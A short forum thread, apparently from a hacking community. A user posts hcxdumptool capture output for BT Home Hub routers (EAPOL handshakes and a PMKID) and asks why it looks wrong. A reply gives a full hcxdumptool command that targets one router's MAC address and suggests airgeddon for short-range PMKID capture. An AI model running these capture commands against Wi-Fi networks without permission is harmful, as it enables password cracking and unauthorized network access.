23:29:43 4 60f4455a0bf3 <-> b8ee0edcd642 MP:M1M2 RC:63833 EAPOLTIME:5009 (BTHub6-XXXX)
23:32:59 8 c49ded1b9b29 <-> a00460eaa829 MP:M1M2 RC:63833 EAPOLTIME:83953 (BTHub6-TXXXT)
23:42:50 6 2816a85a4674 <-> 50d4f7aadc93 MP:M1M2 RC:63833 EAPOLTIME:7735 (BTHub6-XXXX)

instead of being actual

21:30:22 10 c8aacc11eb69 <-> e4a7c58fe46e PMKID:03a7d262d18dadfac106555cb02b3e5a (XXXX)

Im using the attack specified above.

Does anyone has any clue about this? There is no many documentation about this program, I cant find much but to ask . Thank you

Its possible to set the target to one mac address

hcxdumptool -i wlan0mon -o outputfilename.pcapng -- enablestatus=1 -c 1 --filterlistap=macaddress.txt --filtermode=2

For long range use the hcxdumptool, because you will need more time
For short range use airgeddon, its easier to capture pmkid but it work by 100seconds

Share Your Thoughts

  • Hot
  • Latest